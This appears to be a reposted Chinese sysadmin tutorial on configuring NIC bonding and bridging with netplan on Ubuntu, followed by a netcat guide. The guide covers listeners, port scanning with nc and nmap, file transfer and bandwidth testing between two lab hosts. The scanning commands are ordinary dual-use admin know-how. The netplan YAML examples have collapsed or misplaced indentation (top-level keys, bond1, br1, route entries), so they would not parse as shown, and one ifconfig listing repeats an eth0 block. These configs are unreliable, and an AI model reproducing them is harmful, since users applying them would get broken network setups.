特点：不需要任何特别的switch(交换机)支持的通道bonding。在每个slave上根据当前的负载（根据速度
计算）分配外出流量。如果正在接受数据的slave出故障了，另一个slave接管失败的slave的MAC地址。
该模式的必要条件：
ethtool支持获取每个slave的速率
 
#第七种模式：mod=6，即：(balance-alb) Adaptive load balancing（适配器适应性负载均衡）
特点：该模式包含了balance-tlb模式，同时加上针对IPV4流量的接收负载均衡(receive load
balance,rlb)，而且不需要任何switch(交换机)的支持。
 
 
 
root@ubuntu1804:~# vim /etc/netplan/01-netcfg.yaml
# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
version: 2
renderer: networkd
ethernets:
 eth0:
  dhcp4: no
  dhcp6: no
 eth1:
  dhcp4: no
  dhcp6: no
bonds:
 bond0:
  interfaces:
    - eth0
    - eth1
  addresses: [10.0.0.18/16]
  gateway4: 10.0.0.1
  nameservers:
   addresses: [223.6.6.6,223.5.5.5]
  parameters:
   mode: active-backup
   mii-monitor-interval: 100
   fail-over-mac-policy: active
 
 
 
root@ubuntu1804:~# netplan apply
root@ubuntu1804:~# ifconfig bond0
bond0: flags=5187<UP,BROADCAST,RUNNING,MASTER,MULTICAST> mtu 1500
   inet 10.0.0.18 netmask 255.255.0.0 broadcast 10.0.255.255
   inet6 fe80::2820:b7ff:fea8:5837 prefixlen 64 scopeid 0x20<link>
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 296 bytes 25327 (25.3 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 295 bytes 34876 (34.8 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
root@ubuntu1804:~# ifconfig eth0
eth0: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 3 bytes 180 (180.0 B)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 0 bytes 0 (0.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
 
root@ubuntu1804:~# ifconfig eth1
eth1: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 340 bytes 28893 (28.8 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 336 bytes 39940 (39.9 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
root@ubuntu1804:~# cat /proc/net/bonding/bond0
Ethernet Channel Bonding Driver: v3.7.1 (April 27, 2011)
 
Bonding Mode: fault-tolerance (active-backup)
Primary Slave: None
Currently Active Slave: eth1
MII Status: up
MII Polling Interval (ms): 100
Up Delay (ms): 0
Down Delay (ms): 0
 
Slave Interface: eth1
MII Status: up
Speed: 1000 Mbps
Duplex: full
Link Failure Count: 0
Permanent HW addr: 00:0c:29:34:df:9b
Slave queue ID: 0
 
Slave Interface: eth0
MII Status: up
Speed: 1000 Mbps
Duplex: full
Link Failure Count: 0
Permanent HW addr: 00:0c:29:34:df:91
Slave queue ID: 0
root@ubuntu1804:~#

5.3.7 双⽹卡绑定+桥接

⽹卡绑定⽤于提供⽹卡接⼝冗余以及⾼可⽤和端⼝聚合功能，桥接⽹卡再给需要桥接设备的服务使⽤


root@ubuntu1804:~# cat /etc/netplan/01-netcfg.yaml
# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
version: 2
renderer: networkd
ethernets:
 eth0:
  dhcp4: no
  dhcp6: no
 eth1:
  dhcp4: no
  dhcp6: no
 
bonds:
 bond0:
  interfaces:
    - eth0
    - eth1
  parameters:
   mode: active-backup
   mii-monitor-interval: 100
 
bridges:
 br0:
  dhcp4: no
  dhcp6: no
  addresses: [10.0.0.18/16]
  gateway4: 10.0.0.1
  nameservers:
   addresses: [223.6.6.6,223.5.5.5]
  interfaces:
   - bond0
 
 
root@ubuntu1804:~# netplan apply
root@ubuntu1804:~# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.96dbd15c1daf no bond0
root@ubuntu1804:~# ifconfig br0
br0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.0.0.18 netmask 255.255.0.0 broadcast 10.0.255.255
   inet6 fe80::94db:d1ff:fe5c:1daf prefixlen 64 scopeid 0x20<link>
   ether 96:db:d1:5c:1d:af txqueuelen 1000 (Ethernet)
   RX packets 97 bytes 6634 (6.6 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 83 bytes 8286 (8.2 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
root@ubuntu1804:~# route -n
Kernel IP routing table
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
0.0.0.0     10.0.0.1     0.0.0.0     UG   0    0     0 br0
10.0.0.0     0.0.0.0     255.255.0.0   U   0    0     0 br0
root@ubuntu1804:~# ifconfig
bond0: flags=5187<UP,BROADCAST,RUNNING,MASTER,MULTICAST> mtu 1500
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 2592 bytes 230049 (230.0 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 2826 bytes 318282 (318.2 KB)
   TX errors 0 dropped 1 overruns 0 carrier 0 collisions 0
 
br0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.0.0.18 netmask 255.255.0.0 broadcast 10.0.255.255
   inet6 fe80::94db:d1ff:fe5c:1daf prefixlen 64 scopeid 0x20<link>
   ether 96:db:d1:5c:1d:af txqueuelen 1000 (Ethernet)
   RX packets 144 bytes 9890 (9.8 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 117 bytes 12554 (12.5 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
eth0: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 27 bytes 1990 (1.9 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 0 bytes 0 (0.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
eth0: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 27 bytes 1990 (1.9 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 0 bytes 0 (0.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
   inet 127.0.0.1 netmask 255.0.0.0
   inet6 ::1 prefixlen 128 scopeid 0x10<host>
   loop txqueuelen 1000 (Local Loopback)
   RX packets 1131 bytes 75592 (75.5 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 1131 bytes 75592 (75.5 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

5.3.8 ⽹卡的多组绑定

可以实现网卡的多组绑定，比如：eth0,eth1绑定至bond0,eth2和eth3绑定bond1


root@ubuntu1804:~#cat /etc/netplan/01-netcfg.yaml
# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
version: 2
renderer: networkd
ethernets:
 eth0:
  dhcp4: no
  dhcp6: no
 eth1:
  dhcp4: no
  dhcp6: no
 eth2:
  dhcp4: no
  dhcp6: no
 eth3:
  dhcp4: no
  dhcp6: no
 
 
bonds:
 bond0:
  interfaces:
    - eth0
    - eth1
  addresses: [10.0.0.18/16]
  gateway4: 10.0.0.1
  nameservers:
   addresses: [223.6.6.6,223.5.5.5]
  parameters:
   mode: active-backup
   mii-monitor-interval: 100
 
 
bond1:
  interfaces:
    - eth2
    - eth3
  addresses: [10.10.0.18/16]
  parameters:
   mode: active-backup
   mii-monitor-interval: 100
  routes:
    - to: 10.20.0.0/16
    via: 10.10.0.1
    - to: 10.30.0.0/16
    via: 10.10.0.1
    - to: 10.40.0.0/16
    via: 10.10.0.1
    - to: 10.50.0.0/16
    via: 10.10.0.1
 
 
root@ubuntu1804:~# netplan apply
root@ubuntu1804:~# ifconfig
bond0: flags=5187<UP,BROADCAST,RUNNING,MASTER,MULTICAST> mtu 1500
   inet 10.0.0.18 netmask 255.255.0.0 broadcast 10.0.255.255
   inet6 fe80::2820:b7ff:fea8:5837 prefixlen 64 scopeid 0x20<link>
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 273 bytes 23591 (23.5 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 364 bytes 42455 (42.4 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
bond1: flags=5187<UP,BROADCAST,RUNNING,MASTER,MULTICAST> mtu 1500
   inet 10.10.0.18 netmask 255.255.0.0 broadcast 10.10.255.255
   inet6 fe80::c035:83ff:fea1:abbb prefixlen 64 scopeid 0x20<link>
   ether c2:35:83:a1:ab:bb txqueuelen 1000 (Ethernet)
   RX packets 8 bytes 480 (480.0 B)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 10 bytes 796 (796.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
eth0: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 4 bytes 240 (240.0 B)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 0 bytes 0 (0.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
eth1: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 269 bytes 23351 (23.3 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 364 bytes 42455 (42.4 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
eth2: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether c2:35:83:a1:ab:bb txqueuelen 1000 (Ethernet)
   RX packets 4 bytes 240 (240.0 B)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 0 bytes 0 (0.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
eth3: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether c2:35:83:a1:ab:bb txqueuelen 1000 (Ethernet)
   RX packets 4 bytes 240 (240.0 B)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 10 bytes 796 (796.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
   inet 127.0.0.1 netmask 255.0.0.0
   inet6 ::1 prefixlen 128 scopeid 0x10<host>
   loop txqueuelen 1000 (Local Loopback)
   RX packets 120 bytes 8344 (8.3 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 120 bytes 8344 (8.3 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
root@ubuntu1804:~# route -n
Kernel IP routing table
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
0.0.0.0     10.0.0.1     0.0.0.0     UG   0    0     0 bond0
10.0.0.0     0.0.0.0     255.255.0.0   U   0    0     0 bond0
10.10.0.0    0.0.0.0     255.255.0.0   U   0    0     0 bond1
10.20.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 bond1
10.30.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 bond1
10.40.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 bond1
10.50.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 bond1
 
 
root@ubuntu1804:~# cat /proc/net/bonding/bond0
Ethernet Channel Bonding Driver: v3.7.1 (April 27, 2011)
 
Bonding Mode: fault-tolerance (active-backup)
Primary Slave: None
Currently Active Slave: eth1
MII Status: up
MII Polling Interval (ms): 100
Up Delay (ms): 0
Down Delay (ms): 0
。。。。
 
 
root@ubuntu1804:~# cat /proc/net/bonding/bond1
Ethernet Channel Bonding Driver: v3.7.1 (April 27, 2011)
Bonding Mode: fault-tolerance (active-backup)
Primary Slave: None
Currently Active Slave: eth3
MII Status: up
MII Polling Interval (ms): 100
Up Delay (ms): 0
Down Delay (ms): 0
 
Slave Interface: eth3
MII Status: up
Speed: 1000 Mbps
Duplex: full
Link Failure Count: 0
Permanent HW addr: 00:0c:29:34:df:b9
Slave queue ID: 0
 
Slave Interface: eth2
MII Status: up
Speed: 1000 Mbps
Duplex: full
Link Failure Count: 0
Permanent HW addr: 00:0c:29:34:df:a5
Slave queue ID: 0

5.3.9 ⽹卡多组绑定+多组桥接


root@ubuntu1804:~# cat /etc/netplan/01-netcfg.yaml
# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
version: 2
renderer: networkd
ethernets:
 eth0:
  dhcp4: no
  dhcp6: no
 eth1:
  dhcp4: no
   dhcp6: no
 eth2:
  dhcp4: no
  dhcp6: no
 eth3:
  dhcp4: no
  dhcp6: no
 
 
bonds:
 bond0:
  interfaces:
    - eth0
    - eth1
  parameters:
   mode: active-backup
   mii-monitor-interval: 100
 
bond1:
  interfaces:
    - eth2
    - eth3
  parameters:
   mode: active-backup
   mii-monitor-interval: 100
 
 
bridges:
 br0:
  dhcp4: no
  dhcp6: no
  addresses: [10.0.0.18/16]
  gateway4: 10.0.0.1
  nameservers:
   addresses: [223.6.6.6,223.5.5.5]
  interfaces:
    - bond0
 
br1:
  dhcp4: no
  dhcp6: no
  interfaces:
    - bond1
  addresses: [10.10.0.18/16]
  routes:
    - to: 10.20.0.0/16
    via: 10.10.0.1
    - to: 10.30.0.0/16
    via: 10.10.0.1
    - to: 10.40.0.0/16
    via: 10.10.0.1
    - to: 10.50.0.0/16
    via: 10.10.0.1
 
root@ubuntu1804:~# netplan apply    
root@ubuntu1804:~# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.96dbd15c1daf no bond0
br1 8000.9e02ab0faeb0 no bond1
root@ubuntu1804:~# route -n
Kernel IP routing table
 
 
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
0.0.0.0     10.0.0.1     0.0.0.0     UG   0    0     0 br0
10.0.0.0     0.0.0.0     255.255.0.0   U   0    0     0 br0
10.10.0.0    0.0.0.0     255.255.0.0   U   0    0     0 br1
10.20.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 br1
10.30.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 br1
10.40.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 br1
10.50.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 br1
 
 
 
root@ubuntu1804:~# ifconfig
bond0: flags=5187<UP,BROADCAST,RUNNING,MASTER,MULTICAST> mtu 1500
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 1749 bytes 154597 (154.5 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 1951 bytes 224182 (224.1 KB)
   TX errors 0 dropped 2 overruns 0 carrier 0 collisions 0
 
bond1: flags=5187<UP,BROADCAST,RUNNING,MASTER,MULTICAST> mtu 1500
   ether c2:35:83:a1:ab:bb txqueuelen 1000 (Ethernet)
   RX packets 441 bytes 43111 (43.1 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 21 bytes 1642 (1.6 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
br0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.0.0.18 netmask 255.255.0.0 broadcast 10.0.255.255
   inet6 fe80::94db:d1ff:fe5c:1daf prefixlen 64 scopeid 0x20<link>
   ether 96:db:d1:5c:1d:af txqueuelen 1000 (Ethernet)
   RX packets 164 bytes 11692 (11.6 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 148 bytes 16165 (16.1 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
br1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.10.0.18 netmask 255.255.0.0 broadcast 10.10.255.255
   inet6 fe80::9c02:abff:fe0f:aeb0 prefixlen 64 scopeid 0x20<link>
   ether 9e:02:ab:0f:ae:b0 txqueuelen 1000 (Ethernet)
   RX packets 13 bytes 788 (788.0 B)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 9 bytes 726 (726.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
eth0: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 24 bytes 1906 (1.9 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 0 bytes 0 (0.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
eth1: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether 2a:20:b7:a8:58:37 txqueuelen 1000 (Ethernet)
   RX packets 1725 bytes 152691 (152.6 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 1951 bytes 224182 (224.1 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
eth2: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether c2:35:83:a1:ab:bb txqueuelen 1000 (Ethernet)
   RX packets 24 bytes 1906 (1.9 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 0 bytes 0 (0.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
eth3: flags=6211<UP,BROADCAST,RUNNING,SLAVE,MULTICAST> mtu 1500
   ether c2:35:83:a1:ab:bb txqueuelen 1000 (Ethernet)
   RX packets 417 bytes 41205 (41.2 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 21 bytes 1642 (1.6 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
   inet 127.0.0.1 netmask 255.0.0.0
   inet6 ::1 prefixlen 128 scopeid 0x10<host>
   loop txqueuelen 1000 (Local Loopback)
   RX packets 793 bytes 53888 (53.8 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 793 bytes 53888 (53.8 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
 
 
root@ubuntu1804:~# cat /proc/net/bonding/bond1
Ethernet Channel Bonding Driver: v3.7.1 (April 27, 2011)
。。。。

6，nc - 网络工具箱中的「瑞士军刀」

netcat被誉为网络安全界的‘瑞士军刀’，相信没有什么人不认识它吧......
一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。

软件介绍：

工具名：Netcatnc 是 Linux下强大的网络命令行工具，主要用于 TCP、UDP、UNIX域套接字相关的操作

它被设计成可以由其他程序灵活驱动可靠的后台工具，拥有 "瑞士军刀" 的美称，每个系统管理员都应该掌握它

6.1安装及用法


#安装：
[root@ecs-centos-7 ~]# yum install nc
[root@ecs-centos-7 ~]# nc --version
Ncat: Version 7.50 ( https://nmap.org/ncat )
 
 
#语法：
nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]
 
 
#参数说明：
 
-g    <网关> 设置路由器跃程通信网关，最多可设置8个。
-G    <指向器数目> 设置来源路由指向器，其数值为4的倍数。
-h     在线帮助。
-i    <延迟秒数> 设置时间间隔，以便传送信息及扫描通信端口。
-l     使用监听模式，管控传入的资料。
-n     直接使用IP地址，而不通过域名服务器。
-o    <输出文件> 指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存。
-p    <通信端口> 设置本地主机使用的通信端口。
-r     乱数指定本地与远端主机的通信端口。
-s    <来源位址> 设置本地主机送出数据包的IP地址。
-u     使用UDP传输协议。
-v     显示指令执行过程。
-w    <超时秒数> 设置等待连线的时间。
-z     使用0输入/输出模式，只在扫描通信端口时使用。

6.2 使用nc测试网络连通性测试和端口扫描

nc可以作为server端启动一个tcp的监听（注意，此处重点是起tcp，下面还会讲udp）

先关闭A的防火墙，或者放行下面端口，然后测试B机器是否可以访问A机器启动的端口
在A机器上启动一个端口监听，比如 9999端口（注意：下面的-l 是小写的L，不是数字1）
默认情况下下面监听的是一个tcp的端口
nc -l 9999
此命令默认监听tcp端口

6.2.1客户端测试测试方法1:

在B机器上telnet A机器此端口，如下显示表示B机器可以访问A机器此端口
telnet 10.0.1.161  9999

6.2.2客户端测试，测试方法2

B机器上也可以使用nmap扫描A机器的此端口
nmap 10.0.1.161 -p9999

6.2.3 客户端测试，测试方法3

使用nc命令作为客户端工具进行端口探测


nc -vz -w 2 10.0.1.161 9999
或者
nc -vzw 2 10.0.1.161 9999
 
（-v可视化，-z扫描时不发送数据，-w超时几秒，后面跟数字）

6.2.4客户端测试，测试方法4（和方法3相似，但用处更大）

6.2.4.1 nc可以可以扫描连续端口，这个作用非常重要。常常可以用来扫描服务器端口，然后给服务器安全加固在A机器上监听2个端口，一个9999，一个9998，使用&符号丢入后台

6.4.2.2 在客户端B机器上扫描连续的两个端口，如下

6.2.5nc作为server端启动一个udp的监听（注意，此处重点是起udp）

6.2.5.1 启动一个udp的端口监听

nc  -ul  9998

6.2.5.2复制当前窗口输入 netstat -antup |grep 9998 可以看到是启动了udp的监听

6.2.6 客户端测试，测试方法1

由于udp的端口无法在客户端使用telnet去测试，我们可以使用nc命令去扫描（前面提到nc还可以用来扫描端口）（telnet是运行于tcp协议的）
nc -vuz 10.0.1.161 9998
 
（u表示udp端口，v表示可视化输出，z表示扫描时不发送数据）

上面在B机器扫描此端口的时候，看到A机器下面出现一串XXXXX字符串

6.2.7客户端测试，测试方法2

（它暂无法测试nc启动的udp端口，每次探测nc作为server端启动的udp端口时，会导致对方退出侦听，有这个bug，对于一些程序启动的udp端口在使用nc扫描时不会有此bug）

nmap -sU 10.0.1.161 -p 9998 -Pn

下面，A机器启动一个udp的端口监听，端口为9998

在复制的窗口上可以确认已经在监听了

B机器使用nmap命令去扫描此udp端口，在扫描过程中，导致A机器的nc退出监听。所以显示端口关闭了（我推测是扫描时发数据导致的）
nmap -sU 10.0.1.161 -p 9998 -Pn
-sU ：表示udp端口的扫描
-Pn ：如果服务器禁PING或者放在防火墙下面的，不加-Pn 参数的它就会认为这个扫描的主机不存活就不会进行扫描了，如果不加-Pn就会像下面的结果一样，它也会进行提示你添加上-Pn参数尝试的

注意：如果A机器开启了防火墙，扫描结果可能会是下面状态。（不能确定对方是否有监听9998端口）

既然上面测试无法使用nmap扫描nc作为服务端启动的端口，我们可以使用nmap扫描其余的端口

下面，A机器上rpcbind服务，监听在udp的111端口

在B机器上使用nmap扫描此端口，是正常的检测到处于open状态

6.2.8客户端测试，测试方法3

nc扫描大量udp端口

扫描过程比较慢，可能是1秒扫描一个端口，下面表示扫描A机器的1到1000端口（暂未发现可以在一行命令中扫描分散的几个端口的方法）

nc -vuz 10.0.1.161 1-1000

6.3使用nc传输文件和目录

方法1，传输文件演示（先启动接收命令）

使用nc传输文件还是比较方便的，因为不用scp和rsync那种输入密码的操作了

把A机器上的一个rpm文件发送到B机器上

需注意操作次序，receiver先侦听端口，sender向receiver所在机器的该端口发送数据。

#步骤1：
先在B机器上启动一个接收文件的监听，格式如下
意思是把赖在9995端口接收到的数据都写到file文件里（这里文件名随意取）
nc -l port >file
nc -l 9995 >zabbix.rpm

步骤2，在A机器上往B机器的9995端口发送数据，把下面rpm包发送过去

nc 10.0.1.162 9995 < zabbix-release-2.4-1.el6.noarch.rpm

B机器接收完毕，它会自动退出监听，文件大小和A机器一样，md5值也一样

方法2，传输文件演示（先启动发送命令）

步骤1，先在B机器上，启动发送文件命令

下面命令表示通过本地的9992端口发送test.mv文件

nc -l 9992 <test.mv

步骤2，A机器上连接B机器，取接收文件

下面命令表示通过连接B机器的9992端口接收文件，并把文件存到本目录下，文件名为test2.mv

nc 10.0.1.162 9992 >test2.mv

方法3，传输目录演示（方法发送文件类似）

步骤1，B机器先启动监听，如下

A机器给B机器发送多个文件

传输目录需要结合其它的命令，比如tar

经过我的测试管道后面最后必须是 - ，不能是其余自定义的文件名

nc -l 9995 | tar xfvz -

步骤2，A机器打包文件并连接B机器的端口

管道前面表示把当前目录的所有文件打包为 - ，然后使用nc发送给B机器

tar cfz - * | nc 10.0.1.162 9995

B机器这边已经自动接收和解压

6.4使用nc测试网速

测试网速其实利用了传输文件的原理，就是把来自一台机器的/dev/zero 发送给另一台机器的/dev/null

就是把一台机器的无限个0，传输给另一个机器的空设备上，然后新开一个窗口使用dstat命令监测网速

在这之前需要保证机器先安装dstat工具

yum install -y dstat

方法1，测试网速演示（先启动接收命令方式）

步骤1，A机器先启动接收数据的命令，监听自己的9991端口，把来自这个端口的数据都输出给空设备（这样不写磁盘，测试网速更准确）

nc -l 9991 >/dev/null

步骤2，B机器发送数据，把无限个0发送给A机器的9991端口

nc 10.0.1.161 9991 </dev/zero

在复制的窗口上使用dstat命令查看当前网速，dstat命令比较直观，它可以查看当前cpu，磁盘，网络，内存页和系统的一些当前状态指标。

我们只需要看下面我选中的这2列即可，recv是receive的缩写，表示接收的意思，send是发送数据，另外注意数字后面的单位B，KB，MB

可以看到A机器接收数据，平均每秒400MB左右

B机器新打开的窗口上执行dstat，看到每秒发送400MB左右的数据

方法2，测试网速演示（先启动发送命令方式）

步骤1，先启动发送的数据，谁连接这个端口时就会接收来自zero设备的数据（二进制的无限个0）

nc -l 9990 </dev/zero

步骤2，下面B机器连接A机器的9990端口，把接收的数据输出到空设备上

nc 10.0.1.161 9990 >/dev/null

同样可以使用dstat观察数据发送时的网速

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/代码探险家/article/detail/814622